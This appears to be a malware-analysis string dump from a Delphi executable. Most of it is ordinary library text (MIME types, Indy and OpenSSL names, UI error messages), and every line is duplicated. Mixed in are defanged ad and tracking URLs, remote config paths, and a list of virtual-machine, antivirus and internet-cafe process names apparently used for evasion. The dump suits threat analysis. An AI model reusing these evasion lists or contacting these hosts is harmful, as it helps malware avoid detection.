.pl=application/x-perl
.pl=application/x-perl
.pnq=application/x-icq-pnq
.pnq=application/x-icq-pnq
.pot=application/mspowerpoint
.pot=application/mspowerpoint
.pps=application/mspowerpoint
.pps=application/mspowerpoint
.ppt=application/mspowerpoint
.ppt=application/mspowerpoint
.ppz=application/mspowerpoint
.ppz=application/mspowerpoint
.ps=application/postscript
.ps=application/postscript
.pub=application/x-mspublisher
.pub=application/x-mspublisher
.qpw=application/x-quattropro
.qpw=application/x-quattropro
.qtl=application/x-quicktimeplayer
.qtl=application/x-quicktimeplayer
.rar=application/rar
.rar=application/rar
.rdf=application/rdf xml
.rdf=application/rdf xml
.rjs=application/vnd.rn-realsystem-rjs
.rjs=application/vnd.rn-realsystem-rjs
.rm=application/vnd.rn-realmedia
.rm=application/vnd.rn-realmedia
.rmf=application/vnd.rmf
.rmf=application/vnd.rmf
.rmp=application/vnd.rn-rn_music_package
.rmp=application/vnd.rn-rn_music_package
.rmx=application/vnd.rn-realsystem-rmx
.rmx=application/vnd.rn-realsystem-rmx
.rnx=application/vnd.rn-realplayer
.rnx=application/vnd.rn-realplayer
.rpm=application/x-redhat-package-manager
.rpm=application/x-redhat-package-manager
.rsml=application/vnd.rn-rsml
.rsml=application/vnd.rn-rsml
.rtsp=application/x-rtsp
.rtsp=application/x-rtsp
.rss=application/rss xml
.rss=application/rss xml
.scm=application/x-icq-scm
.scm=application/x-icq-scm
.ser=application/java-serialized-object
.ser=application/java-serialized-object
.sh=application/x-sh
.sh=application/x-sh
.shar=application/x-shar
.shar=application/x-shar
.scd=application/x-msschedule
.scd=application/x-msschedule
.sda=application/vnd.stardivision.draw
.sda=application/vnd.stardivision.draw
.sdc=application/vnd.stardivision.calc
.sdc=application/vnd.stardivision.calc
.sdd=application/vnd.stardivision.impress
.sdd=application/vnd.stardivision.impress
.sdp=application/x-sdp
.sdp=application/x-sdp
.setpay=application/set-payment-initiation
.setpay=application/set-payment-initiation
.setreg=application/set-registration-initiation
.setreg=application/set-registration-initiation
.shw=application/presentations
.shw=application/presentations
.sit=application/x-stuffit
.sit=application/x-stuffit
.skd=application/x-koan
.skd=application/x-koan
.skm=application/x-koan
.skm=application/x-koan
.skp=application/x-koan
.skp=application/x-koan
.skt=application/x-koan
.skt=application/x-koan
.smf=application/vnd.stardivision.math
.smf=application/vnd.stardivision.math
.smi=application/smil
.smi=application/smil
.smil=application/smil
.smil=application/smil
.spl=application/futuresplash
.spl=application/futuresplash
.ssm=application/streamingmedia
.ssm=application/streamingmedia
.sst=application/vnd.ms-pki.certstore
.sst=application/vnd.ms-pki.certstore
.stc=application/vnd.sun.xml.calc.template
.stc=application/vnd.sun.xml.calc.template
.std=application/vnd.sun.xml.draw.template
.std=application/vnd.sun.xml.draw.template
.sti=application/vnd.sun.xml.impress.template
.sti=application/vnd.sun.xml.impress.template
.stl=application/vnd.ms-pki.stl
.stl=application/vnd.ms-pki.stl
.stw=application/vnd.sun.xml.writer.template
.stw=application/vnd.sun.xml.writer.template
.svi=application/softvision
.svi=application/softvision
.sv4cpio=application/x-sv4cpio
.sv4cpio=application/x-sv4cpio
.sv4crc=application/x-sv4crc
.sv4crc=application/x-sv4crc
.swf=application/x-shockwave-flash
.swf=application/x-shockwave-flash
.sxc=application/vnd.sun.xml.calc
.sxc=application/vnd.sun.xml.calc
.sxi=application/vnd.sun.xml.impress
.sxi=application/vnd.sun.xml.impress
.sxm=application/vnd.sun.xml.math
.sxm=application/vnd.sun.xml.math
.sxw=application/vnd.sun.xml.writer
.sxw=application/vnd.sun.xml.writer
.sxg=application/vnd.sun.xml.writer.global
.sxg=application/vnd.sun.xml.writer.global
.tar=application/x-tar
.tar=application/x-tar
.tcl=application/x-tcl
.tcl=application/x-tcl
.tex=application/x-tex
.tex=application/x-tex
.texi=application/x-texinfo
.texi=application/x-texinfo
.texinfo=application/x-texinfo
.texinfo=application/x-texinfo
.tr=application/x-troff
.tr=application/x-troff
.trm=application/x-msterminal
.trm=application/x-msterminal
.troff=application/x-troff
.troff=application/x-troff
.tsp=application/dsptype
.tsp=application/dsptype
.tgz=application/x-compressed
.tgz=application/x-compressed
.torrent=application/x-bittorrent
.torrent=application/x-bittorrent
.ttz=application/t-time
.ttz=application/t-time
.uin=application/x-icq
.uin=application/x-icq
.urls=application/x-url-list
.urls=application/x-url-list
.ustar=application/x-ustar
.ustar=application/x-ustar
.vcd=application/x-cdlink
.vcd=application/x-cdlink
.vor=application/vnd.stardivision.writer
.vor=application/vnd.stardivision.writer
.vsl=application/x-cnet-vsl
.vsl=application/x-cnet-vsl
.wcm=application/vnd.ms-works
.wcm=application/vnd.ms-works
.wb1=application/x-quattropro
.wb1=application/x-quattropro
.wb2=application/x-quattropro
.wb2=application/x-quattropro
.wb3=application/x-quattropro
.wb3=application/x-quattropro
.wdb=application/vnd.ms-works
.wdb=application/vnd.ms-works
.wks=application/vnd.ms-works
.wks=application/vnd.ms-works
.wmd=application/x-ms-wmd
.wmd=application/x-ms-wmd
.wms=application/x-ms-wms
.wms=application/x-ms-wms
.wmz=application/x-ms-wmz
.wmz=application/x-ms-wmz
.wp5=application/wordperfect5.1
.wp5=application/wordperfect5.1
.wpd=application/wordperfect
.wpd=application/wordperfect
.wpl=application/vnd.ms-wpl
.wpl=application/vnd.ms-wpl
.wps=application/vnd.ms-works
.wps=application/vnd.ms-works
.wri=application/x-mswrite
.wri=application/x-mswrite
.xfdf=application/vnd.adobe.xfdf
.xfdf=application/vnd.adobe.xfdf
.xls=application/x-msexcel
.xls=application/x-msexcel
.xlb=application/x-msexcel
.xlb=application/x-msexcel
.xpi=application/x-xpinstall
.xpi=application/x-xpinstall
.xps=application/vnd.ms-xpsdocument
.xps=application/vnd.ms-xpsdocument
.xsd=application/vnd.sun.xml.draw
.xsd=application/vnd.sun.xml.draw
.xul=application/vnd.mozilla.xul xml
.xul=application/vnd.mozilla.xul xml
.zoo=application/x-zoo
.zoo=application/x-zoo
.zip=application/x-zip-compressed
.zip=application/x-zip-compressed
.wbmp=image/vnd.wap.wbmp
.wbmp=image/vnd.wap.wbmp
.wml=text/vnd.wap.wml
.wml=text/vnd.wap.wml
.wmlc=application/vnd.wap.wmlc
.wmlc=application/vnd.wap.wmlc
.wmls=text/vnd.wap.wmlscript
.wmls=text/vnd.wap.wmlscript
.wmlsc=application/vnd.wap.wmlscriptc
.wmlsc=application/vnd.wap.wmlscriptc
.pas=text/x-pascal
.pas=text/x-pascal
.hpp=text/x-c hdr
.hpp=text/x-c hdr
.hxx=text/x-c hdr
.hxx=text/x-c hdr
.hh=text/x-c hdr
.hh=text/x-c hdr
.cpp=text/x-c src
.cpp=text/x-c src
.cxx=text/x-c src
.cxx=text/x-c src
.cc=text/x-c src
.cc=text/x-c src
.java=text/x-java
.java=text/x-java
.css=text/css
.css=text/css
.js=text/javascript
.js=text/javascript
.htm=text/html
.htm=text/html
.html=text/html
.html=text/html
.ls=text/javascript
.ls=text/javascript
.mocha=text/javascript
.mocha=text/javascript
.shtml=server-parsed-html
.shtml=server-parsed-html
.sgm=text/sgml
.sgm=text/sgml
.sgml=text/sgml
.sgml=text/sgml
C:\Builds\TP\indysockets\lib\Protocols\IdGlobalProtocols.pas
C:\Builds\TP\indysockets\lib\Protocols\IdGlobalProtocols.pas
()@,;:\"/[]?=
()@,;:\"/[]?=
()@,;:\"/[]?=
()@,;:\"/[]?=
Content-Disposition: form-data; name="%s"; filename="%s"
Content-Disposition: form-data; name="%s"; filename="%s"
Content-Type: %s
Content-Type: %s
Content-Disposition: form-data; name="%s"
Content-Disposition: form-data; name="%s"
*#% []
*#% []
*#% []
*#% []
HTTPS
HTTPS
TIdEncoder3to4.Encode: Calculated length exceeded (expected
TIdEncoder3to4.Encode: Calculated length exceeded (expected
C:\Builds\TP\indysockets\lib\Protocols\IdCoder3to4.pas
C:\Builds\TP\indysockets\lib\Protocols\IdCoder3to4.pas
TIdEncoder3to4.Encode: Calculated length not met (expected
TIdEncoder3to4.Encode: Calculated length not met (expected
HttpOnly
HttpOnly
HTTPONLY
HTTPONLY
port
port
COMMENTURL
COMMENTURL
PORT
PORT
.local
.local
C:\Builds\TP\indysockets\lib\Protocols\IdZLibCompressorBase.pas
C:\Builds\TP\indysockets\lib\Protocols\IdZLibCompressorBase.pas
C:\Builds\TP\indysockets\lib\Core\IdThread.pas
C:\Builds\TP\indysockets\lib\Core\IdThread.pas
C:\Builds\TP\indysockets\lib\Core\IdScheduler.pas
C:\Builds\TP\indysockets\lib\Core\IdScheduler.pas
Mozilla/3.0 (compatible; Indy Library)
Mozilla/3.0 (compatible; Indy Library)
%d%s%d
%d%s%d
C:\Builds\TP\indysockets\lib\Protocols\IdSSLOpenSSLHeaders.pas
C:\Builds\TP\indysockets\lib\Protocols\IdSSLOpenSSLHeaders.pas
libeay32.dll
libeay32.dll
ssleay32.dll
ssleay32.dll
libssl32.dll
libssl32.dll
SSL_CTX_use_PrivateKey_file
SSL_CTX_use_PrivateKey_file
SSL_CTX_use_PrivateKey
SSL_CTX_use_PrivateKey
SSL_CTX_use_certificate
SSL_CTX_use_certificate
SSL_CTX_use_certificate_file
SSL_CTX_use_certificate_file
SSL_get_peer_certificate
SSL_get_peer_certificate
SSL_CTX_set_default_passwd_cb
SSL_CTX_set_default_passwd_cb
SSL_CTX_set_default_passwd_cb_userdata
SSL_CTX_set_default_passwd_cb_userdata
SSL_CTX_check_private_key
SSL_CTX_check_private_key
X509_STORE_CTX_get_current_cert
X509_STORE_CTX_get_current_cert
DES_set_key
DES_set_key
_ossl_old_des_set_key
_ossl_old_des_set_key
des_set_key
des_set_key
RSA_generate_key
RSA_generate_key
RSA_check_key
RSA_check_key
i2d_PrivateKey_bio
i2d_PrivateKey_bio
X509_set_pubkey
X509_set_pubkey
X509_REQ_set_pubkey
X509_REQ_set_pubkey
PEM_write_bio_PKCS8PrivateKey
PEM_write_bio_PKCS8PrivateKey
PEM_read_bio_PrivateKey
PEM_read_bio_PrivateKey
EVP_PKEY_type
EVP_PKEY_type
EVP_PKEY_new
EVP_PKEY_new
EVP_PKEY_free
EVP_PKEY_free
EVP_PKEY_assign
EVP_PKEY_assign
C:\Builds\TP\indysockets\lib\Protocols\IdSSLOpenSSL.pas
C:\Builds\TP\indysockets\lib\Protocols\IdSSLOpenSSL.pas
C:\Builds\TP\indysockets\lib\Protocols\IdHTTP.pas
C:\Builds\TP\indysockets\lib\Protocols\IdHTTP.pas
application/x-www-form-urlencoded
application/x-www-form-urlencoded
https
https
HTTP/1.0 200 OK
HTTP/1.0 200 OK
HTTP/
HTTP/
Mozilla/5.0
Mozilla/5.0
00-00-00-00-00-00
00-00-00-00-00-00
VBoxService.exe
VBoxService.exe
ShadowTip.exe
ShadowTip.exe
PowerRemind.exe
PowerRemind.exe
ShadowService.exe
ShadowService.exe
AliYunDun.exe
AliYunDun.exe
vmtoolsd.exe
vmtoolsd.exe
wanxiang.exe
wanxiang.exe
pubwin.exe
pubwin.exe
yaoqianshu.exe
yaoqianshu.exe
UKeyMain.exe
UKeyMain.exe
clientmo.exe
clientmo.exe
Jfwclient.exe
Jfwclient.exe
ssp.exe
ssp.exe
mpclient.exe
mpclient.exe
fzclient.exe
fzclient.exe
TLnbLdr.exe
TLnbLdr.exe
yqsclient.exe
yqsclient.exe
barrms.exe
barrms.exe
clsmn.exe
clsmn.exe
RzxMon.exe
RzxMon.exe
rzxsvr.exe
rzxsvr.exe
UDO.exe
UDO.exe
duduniu.exe
duduniu.exe
BarClientView.exe
BarClientView.exe
/paramfile/main.txt
/paramfile/main.txt
360Tray.exe
360Tray.exe
QQPCTray.exe
QQPCTray.exe
/detail.ashx
/detail.ashx
/bestcount.ashx
/bestcount.ashx
/newcount.aspx
/newcount.aspx
/will.html
/will.html
hXXp://p.5mnh.com/s/1/1222/29041.html?uid=907191&
hXXp://p.5mnh.com/s/1/1222/29041.html?uid=907191&
hXXp://VVV.91debug.com/ad.html
hXXp://VVV.91debug.com/ad.html
hXXp://jc.110160.com/ad.htm
hXXp://jc.110160.com/ad.htm
/paramfile/navweb.txt
/paramfile/navweb.txt
/paramfile/desktoplnk.txt
/paramfile/desktoplnk.txt
firefox
firefox
chrome
chrome
opera
opera
hXXp://jc.110160.com
hXXp://jc.110160.com
\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
Kernel32.dll
Kernel32.dll
Open SSL Support DLL Delphi and C Builder interface
Open SSL Support DLL Delphi and C Builder interface
hXXp://VVV.indyproject.org/
hXXp://VVV.indyproject.org/
1993 - 2009
1993 - 2009
Portable Network Graphics
Portable Network Graphics
hXXp://tj.sui17.com
hXXp://tj.sui17.com
/paramfile/tasklist.txt
/paramfile/tasklist.txt
/IsNoInstall.ashx
/IsNoInstall.ashx
ymeta.dat
ymeta.dat
cThis "Portable Network Graphics" image uses an unknown interlace scheme which could not be decoded.-The chunks must be compatible to be assigned.jThis "Portable Network Graphics" image is invalid because the decoder found an unexpected end of the file.8This "Portable Network Graphics" image contains no data.]The program tried to add a existent critical chunk to the current image which is not allowed.IIt's not allowed to add a new chunk because the current image is invalid.7The png image could not be loaded from the resource ID.oSome operation could not be performed because the system is out of resources. Close some windows and try again.
cThis "Portable Network Graphics" image uses an unknown interlace scheme which could not be decoded.-The chunks must be compatible to be assigned.jThis "Portable Network Graphics" image is invalid because the decoder found an unexpected end of the file.8This "Portable Network Graphics" image contains no data.]The program tried to add a existent critical chunk to the current image which is not allowed.IIt's not allowed to add a new chunk because the current image is invalid.7The png image could not be loaded from the resource ID.oSome operation could not be performed because the system is out of resources. Close some windows and try again.
Setting bit transparency color is not allowed for png images containing alpha value for each pixel (COLOR_RGBALPHA and COLOR_GRAYSCALEALPHA)OThis operation is not valid because the current image contains no valid header.4The new size provided for image resizing is invalid.oThe "Portable Network Graphics" could not be created because invalid image type parameters have being provided.
Setting bit transparency color is not allowed for png images containing alpha value for each pixel (COLOR_RGBALPHA and COLOR_GRAYSCALEALPHA)OThis operation is not valid because the current image contains no valid header.4The new size provided for image resizing is invalid.oThe "Portable Network Graphics" could not be created because invalid image type parameters have being provided.
Unsupported operation.&Cannot change the size of a JPEG image
Unsupported operation.&Cannot change the size of a JPEG image
JPEG error #%d
JPEG error #%d
JPEG Image FilejThis "Portable Network Graphics" image is not valid because it contains invalid pieces of data (crc error)yThe "Portable Network Graphics" image could not be loaded because one of its main piece of data (ihdr) might be corruptedUThis "Portable Network Graphics" image is invalid because it has missing image parts.[Could not decompress the image because it contains invalid compressed data.
JPEG Image FilejThis "Portable Network Graphics" image is not valid because it contains invalid pieces of data (crc error)yThe "Portable Network Graphics" image could not be loaded because one of its main piece of data (ihdr) might be corruptedUThis "Portable Network Graphics" image is invalid because it has missing image parts.[Could not decompress the image because it contains invalid compressed data.
Description: BThe "Portable Network Graphics" image contains an invalid palette.
Description: BThe "Portable Network Graphics" image contains an invalid palette.
The file being read is not a valid "Portable Network Graphics" image because it contains an invalid header. This file may be corrupted, try obtaining it againnThis "Portable Network Graphics" image is not supported or it might be invalid.
The file being read is not a valid "Portable Network Graphics" image because it contains an invalid header. This file may be corrupted, try obtaining it againnThis "Portable Network Graphics" image is not supported or it might be invalid.
This "Portable Network Graphics" image is not supported because either it's width or height exceeds the maximum size, which is 65535 pixels length.
This "Portable Network Graphics" image is not supported because either it's width or height exceeds the maximum size, which is 65535 pixels length.
There is no such palette entry.dThis "Portable Network Graphics" image contains an unknown critical part which could not be decoded.pThis "Portable Network Graphics" image is encoded with an unknown compression scheme which could not be decoded.
There is no such palette entry.dThis "Portable Network Graphics" image contains an unknown critical part which could not be decoded.pThis "Portable Network Graphics" image is encoded with an unknown compression scheme which could not be decoded.
Error creating SSL context. Could not load root certificate.
Error creating SSL context. Could not load root certificate.
Could not load certificate.#Could not load key, check password.
Could not load certificate.#Could not load key, check password.
SSL status: "%s"pUnsupported object type. You can assign only one of the following types or their descendants: TStrings, TStream.
SSL status: "%s"pUnsupported object type. You can assign only one of the following types or their descendants: TStrings, TStream.
$Buffer terminator must be specified.!Buffer start position is invalid.$Cannot change a connected IOHandler.%No IOHandler of type %s is installed.
$Buffer terminator must be specified.!Buffer start position is invalid.$Cannot change a connected IOHandler.%No IOHandler of type %s is installed.
Reply Code is not valid: %s
Reply Code is not valid: %s
Reply Code already exists: %s
Reply Code already exists: %s
Unknown Protocol(Request method requires HTTP version 1.1DThis authentication method is already registered with class name %s.KUnsupported hash algorithm. This implementation supports only MD5 encoding.
Unknown Protocol(Request method requires HTTP version 1.1DThis authentication method is already registered with class name %s.KUnsupported hash algorithm. This implementation supports only MD5 encoding.
File "%s" not found
File "%s" not found
Object type not supported.
Object type not supported.
Transparent proxy cannot bind. UDP Not supported by this proxy.QRequest rejected because the client program and identd report different user-ids.
Transparent proxy cannot bind. UDP Not supported by this proxy.QRequest rejected because the client program and identd report different user-ids.
Command not supported.
Command not supported.
Address type not supported."%d: Circular links are not allowed"Not enough data in buffer. (%d/%d)
Address type not supported."%d: Circular links are not allowed"Not enough data in buffer. (%d/%d)
1Only one TIdAntiFreeze can exist per application.&Cannot change IPVersion when connected$Can not bind in port range (%d - %d)
1Only one TIdAntiFreeze can exist per application.&Cannot change IPVersion when connected$Can not bind in port range (%d - %d)
Connection Closed Gracefully.;Could not bind socket. Address and port are already in use.
Connection Closed Gracefully.;Could not bind socket. Address and port are already in use.
Invalid Port Range (%d - %d)
Invalid Port Range (%d - %d)
%s is not a valid service.
%s is not a valid service.
%s is not a valid IPv6 address:The requested IPVersion / Address family is not supported.
%s is not a valid IPv6 address:The requested IPVersion / Address family is not supported.
Set Size Exceeded.)UDP is not support in this SOCKS version.
Set Size Exceeded.)UDP is not support in this SOCKS version.
Socket is not connected..Cannot send or receive after socket is closed.#Too many references, cannot splice.
Socket is not connected..Cannot send or receive after socket is closed.#Too many references, cannot splice.
Socket operation on non-socket.
Socket operation on non-socket.
Protocol not supported.
Protocol not supported.
Socket type not supported."Operation not supported on socket.
Socket type not supported."Operation not supported on socket.
Protocol family not supported.0Address family not supported by protocol family.
Protocol family not supported.0Address family not supported by protocol family.
Resolving hostname %s.
Resolving hostname %s.
Connecting to %s.
Connecting to %s.
Socket Error # %d
Socket Error # %d
Operation would block.
Operation would block.
Operation now in progress.
Operation now in progress.
Operation already in progress.
Operation already in progress.
Error setting %s.Count8Listbox (%s) style must be virtual in order to set Count
Error setting %s.Count8Listbox (%s) style must be virtual in order to set Count
OLE error %.8x.Method '%s' not supported by automation object/Variant does not reference an automation object7Dispatch methods do not support more than 64 parameters
OLE error %.8x.Method '%s' not supported by automation object/Variant does not reference an automation object7Dispatch methods do not support more than 64 parameters
DCOM not installed"'%s' is not a valid property value
DCOM not installed"'%s' is not a valid property value
OLE control activation failed*Could not obtain OLE control window handle%License information for %s is invalidPLicense information for %s not found. You cannot use this control in design modeNUnable to retrieve a pointer to a running object registered with OLE for %s/%s4Failed attempting to retrieve time zone information.-Error on call to Winsock2 library function %s&Error on loading Winsock2 library (%s)
OLE control activation failed*Could not obtain OLE control window handle%License information for %s is invalidPLicense information for %s not found. You cannot use this control in design modeNUnable to retrieve a pointer to a running object registered with OLE for %s/%s4Failed attempting to retrieve time zone information.-Error on call to Winsock2 library function %s&Error on loading Winsock2 library (%s)
Unable to insert a line Clipboard does not support Icons Operation not supported on selected printer.There is no default printer currently selected/Menu '%s' is already being used by another form
Unable to insert a line Clipboard does not support Icons Operation not supported on selected printer.There is no default printer currently selected/Menu '%s' is already being used by another form
- Dock zone has no controlLError loading dock zone from the stream. Expecting version %d, but found %d.
- Dock zone has no controlLError loading dock zone from the stream. Expecting version %d, but found %d.
Enhanced Metafiles Cannot focus a disabled or invisible window!Control '%s' has no parent window$Parent given is not a parent of '%s'
Enhanced Metafiles Cannot focus a disabled or invisible window!Control '%s' has no parent window$Parent given is not a parent of '%s'
%s on %s@GroupIndex cannot be less than a previous menu item's GroupIndex
%s on %s@GroupIndex cannot be less than a previous menu item's GroupIndex
Scan line index out of range!Cannot change the size of an iconÊnnot change the size of a WIC Image Invalid operation on TOleGraphic$Unknown picture file extension (.%s)
Scan line index out of range!Cannot change the size of an iconÊnnot change the size of a WIC Image Invalid operation on TOleGraphic$Unknown picture file extension (.%s)
Unsupported clipboard format
Unsupported clipboard format
#''%s'' is not a valid date and time#''%s'' is not a valid integer value
#''%s'' is not a valid date and time#''%s'' is not a valid integer value
''%s'' is not a valid time
''%s'' is not a valid time
No help found for %s
No help found for %s
Invalid image-Cannot terminate an externally created thread,Cannot wait for an externally created thread2Cannot call Start on a running or suspended thread'Parameter %s cannot be a negative value*Input buffer exceeded for %s = %d, %s = %d
Invalid image-Cannot terminate an externally created thread,Cannot wait for an externally created thread2Cannot call Start on a running or suspended thread'Parameter %s cannot be a negative value*Input buffer exceeded for %s = %d, %s = %d
The specified path is too long The specified path was not found The path format is not supported The specified file was not found$No help viewer that supports filters7String index out of range (%d). Must be >= 1 and
The specified path is too long The specified path was not found The path format is not supported The specified file was not found$No help viewer that supports filters7String index out of range (%d). Must be >= 1 and
Invalid Timeout value: %s
Invalid Timeout value: %s
''%s'' is not a valid date Out of memory while expanding memory stream)%s has not been registered as a COM class
''%s'' is not a valid date Out of memory while expanding memory stream)%s has not been registered as a COM class
Error reading %s%s%s: %s
Error reading %s%s%s: %s
Failed to create key %s
Failed to create key %s
Failed to get data for '%s'
Failed to get data for '%s'
Failed to set data for '%s'
Failed to set data for '%s'
Resource %s not found
Resource %s not found
%s.Seek not implemented$Operation not allowed on sorted list$%s not in a class registration group
%s.Seek not implemented$Operation not allowed on sorted list$%s not in a class registration group
Property %s does not exist
Property %s does not exist
Thread creation error: %s
Thread creation error: %s
Thread Error: %s (%d)
Thread Error: %s (%d)
%List does not allow duplicates ($0%x)#A component named %s already exists%String list does not allow duplicates
%List does not allow duplicates ($0%x)#A component named %s already exists%String list does not allow duplicates
Cannot create file "%s". %s
Cannot create file "%s". %s
Cannot open file "%s". %s
Cannot open file "%s". %s
Unable to write to %s
Unable to write to %s
Invalid file name - %s
Invalid file name - %s
Invalid stream format$''%s'' is not a valid component name
Invalid stream format$''%s'' is not a valid component name
Invalid data type for '%s' List capacity out of bounds (%d)
Invalid data type for '%s' List capacity out of bounds (%d)
List count out of bounds (%d)
List count out of bounds (%d)
List index out of bounds (%d)
List index out of bounds (%d)
Invalid destination array"Character index out of bounds (%d)
Invalid destination array"Character index out of bounds (%d)
Start index out of bounds (%d)
Start index out of bounds (%d)
Invalid count (%d)
Invalid count (%d)
Invalid destination index (%d)
Invalid destination index (%d)
Ancestor for '%s' not found
Ancestor for '%s' not found
Cannot assign a %s to a %s
Cannot assign a %s to a %s
Bits index out of range*Can't write to a read-only resource streamECheckSynchronize called from thread $%x, which is NOT the main thread
Bits index out of range*Can't write to a read-only resource streamECheckSynchronize called from thread $%x, which is NOT the main thread
Class %s not found
Class %s not found
A class named %s already exists
A class named %s already exists
External exception %x
External exception %x
Interface not supported
Interface not supported
Object lock not owned(Monitor support function not initialized
Object lock not owned(Monitor support function not initialized
%s (%s, line %d)
%s (%s, line %d)
Abstract Error?Access violation at address %p in module '%s'. %s of address %p
Abstract Error?Access violation at address %p in module '%s'. %s of address %p
System Error. Code: %d.
System Error. Code: %d.
Invalid variant operation
Invalid variant operation
Invalid NULL variant operation%Invalid variant operation (%s%.8x)
Invalid NULL variant operation%Invalid variant operation (%s%.8x)
%s,Custom variant type (%s%.4x) is out of range/Custom variant type (%s%.4x) already used by %s*Custom variant type (%s%.4x) is not usable2Too many custom variant types have been registered5Could not convert variant of type (%s) into type (%s)=Overflow while converting variant of type (%s) into type (%s)
%s,Custom variant type (%s%.4x) is out of range/Custom variant type (%s%.4x) already used by %s*Custom variant type (%s%.4x) is not usable2Too many custom variant types have been registered5Could not convert variant of type (%s) into type (%s)=Overflow while converting variant of type (%s) into type (%s)
Operation not supported
Operation not supported
Invalid pointer operation
Invalid pointer operation
Invalid class typecast0Access violation at address %p. %s of address %p
Invalid class typecast0Access violation at address %p. %s of address %p
Operation aborted(Exception %s in module %s at %p.
Operation aborted(Exception %s in module %s at %p.
Application Error1Format '%s' invalid or incompatible with argument
Application Error1Format '%s' invalid or incompatible with argument
No argument for format '%s'"Variant method calls not supported
No argument for format '%s'"Variant method calls not supported
('%s' is not a valid floating point value
('%s' is not a valid floating point value
I/O error %d
I/O error %d
Integer overflow Invalid floating point operation
Integer overflow Invalid floating point operation
%original file name%.exe_196_rwx_00567000_00015000:
1.2.3
1.2.3
deflate 1.2.3 Copyright 1995-2005 Jean-loup Gailly
deflate 1.2.3 Copyright 1995-2005 Jean-loup Gailly
inflate 1.2.3 Copyright 1995-2005 Mark Adler
inflate 1.2.3 Copyright 1995-2005 Mark Adler
KGS!@#$%X
KGS!@#$%X
?456789:;
?456789:;
!"#$%&'()* ,-./0123
!"#$%&'()* ,-./0123
oleaut32.dll
oleaut32.dll
advapi32.dll
advapi32.dll
RegOpenKeyExW
RegOpenKeyExW
RegCloseKey
RegCloseKey
user32.dll
user32.dll
kernel32.dll
kernel32.dll
UnhookWindowsHookEx
UnhookWindowsHookEx
SetWindowsHookExW
SetWindowsHookExW
MsgWaitForMultipleObjectsEx
MsgWaitForMultipleObjectsEx
MsgWaitForMultipleObjects
MsgWaitForMultipleObjects
MapVirtualKeyW
MapVirtualKeyW
LoadKeyboardLayoutW
LoadKeyboardLayoutW
GetKeyboardState
GetKeyboardState
GetKeyboardLayoutNameW
GetKeyboardLayoutNameW
GetKeyboardLayoutList
GetKeyboardLayoutList
GetKeyboardLayout
GetKeyboardLayout
GetKeyState
GetKeyState
GetKeyNameTextW
GetKeyNameTextW
EnumWindows
EnumWindows
EnumThreadWindows
EnumThreadWindows
EnumChildWindows
EnumChildWindows
ActivateKeyboardLayout
ActivateKeyboardLayout
msimg32.dll
msimg32.dll
gdi32.dll
gdi32.dll
SetViewportOrgEx
SetViewportOrgEx
version.dll
version.dll
GetCPInfo
GetCPInfo
CreateIoCompletionPort
CreateIoCompletionPort
RegUnLoadKeyW
RegUnLoadKeyW
RegSaveKeyW
RegSaveKeyW
RegRestoreKeyW
RegRestoreKeyW
RegReplaceKeyW
RegReplaceKeyW
RegQueryInfoKeyW
RegQueryInfoKeyW
RegLoadKeyW
RegLoadKeyW
RegFlushKey
RegFlushKey
RegEnumKeyExW
RegEnumKeyExW
RegDeleteKeyW
RegDeleteKeyW
RegCreateKeyExW
RegCreateKeyExW
ole32.dll
ole32.dll
comctl32.dll
comctl32.dll
shell32.dll
shell32.dll
ShellExecuteW
ShellExecuteW
winspool.drv
winspool.drv
netapi32.dll
netapi32.dll
uxtheme.dll
uxtheme.dll
DWMAPI.DLL
DWMAPI.DLL
windowscodecs.dll
windowscodecs.dll
%original file name%.exe_196_rwx_005BD000_00003000:
lstrcmpiALoadLibraryALocalFreeLocalAllocGetACPSleepVirtualFreeVirtualAllocGetSystemInfoGetTickCountQueryPerformanceCounterGetVersionGetCurrentThreadIdVirtualQueryWideCharToMultiByteMultiByteToWideCharlstrlenWlstrcpynWLoadLibraryExWIsValidLocaleGetSystemDefaultUILanguageGetStartupInfoAGetProcAddressGetModuleHandleWGetModuleFileNameWGetUserDefaultUILanguageGetLocaleInfoWGetLastErrorGetCommandLineWFreeLibraryFindFirstFileWFindCloseExitProcessExitThreadCreateThreadCompareStringWWriteFileUnhandledExceptionFilterRtlUnwindRaiseExceptionGetStdHandleDeleteCriticalSectionLeaveCriticalSectionEnterCriticalSectionInitializeCriticalSectionCloseHandleRegQueryValueExWRegOpenKeyExWRegCloseKeyLoadStringWMessageBoxACharNextWSysFreeStringSysReAllocStringLenSysAllocStringLenTlsSetValueTlsGetValueLocalAllocGetModuleHandleWCreateWindowExWWindowFromPointWaitMessageUpdateWindowUnregisterClassWUnhookWindowsHookExTranslateMessageTranslateMDISysAccelTrackPopupMenuSystemParametersInfoWShowWindowShowScrollBarShowOwnedPopupsSetWindowsHookExWSetWindowTextWSetWindowPosSetWindowPlacementSetWindowLongWSetTimerSetScrollRangeSetScrollPosSetScrollInfoSetRectSetPropWSetParentSetMenuItemInfoWSetMenuSetForegroundWindowSetFocusSetCursorPosSetCursorSetClassLongWSetCaptureSetActiveWindowSendMessageASendMessageWScrollWindowScreenToClientRemovePropWRemoveMenuReleaseDCReleaseCaptureRegisterWindowMessageWRegisterClipboardFormatWRegisterClassWRedrawWindowPtInRectPostQuitMessagePostMessageWPeekMessageAPeekMessageWOffsetRectMsgWaitForMultipleObjectsExMsgWaitForMultipleObjectsMessageBoxWMapWindowPointsMapVirtualKeyWLoadStringWLoadKeyboardLayoutWLoadIconWLoadCursorWLoadBitmapWKillTimerIsZoomedIsWindowVisibleIsWindowUnicodeIsWindowEnabledIsWindowIsIconicIsDialogMessageAIsDialogMessageWIsChildInvalidateRectIntersectRectInsertMenuItemWInsertMenuWInflateRectGetWindowThreadProcessIdGetWindowTextWGetWindowRectGetWindowPlacementGetWindowLongWGetWindowDCGetTopWindowGetSystemMetricsGetSystemMenuGetSysColorBrushGetSysColorGetSubMenuGetScrollRangeGetScrollPosGetScrollInfoGetPropWGetParentGetWindowGetMessageTimeGetMessagePosGetMessageExtraInfoGetMenuStringWGetMenuStateGetMenuItemInfoWGetMenuItemIDGetMenuItemCountGetMenuGetLastActivePopupGetKeyboardStateGetKeyboardLayoutNameWGetKeyboardLayoutListGetKeyboardLayoutGetKeyStateGetKeyNameTextWGetIconInfoGetForegroundWindowGetFocusGetDesktopWindowGetDCExGetDCGetCursorPosGetCursorGetClipboardDataGetClientRectGetClassLongWGetClassInfoWGetCaptureGetActiveWindowFrameRectFindWindowExWFindWindowWFillRectEnumWindowsEnumThreadWindowsEnumChildWindowsEndPaintEn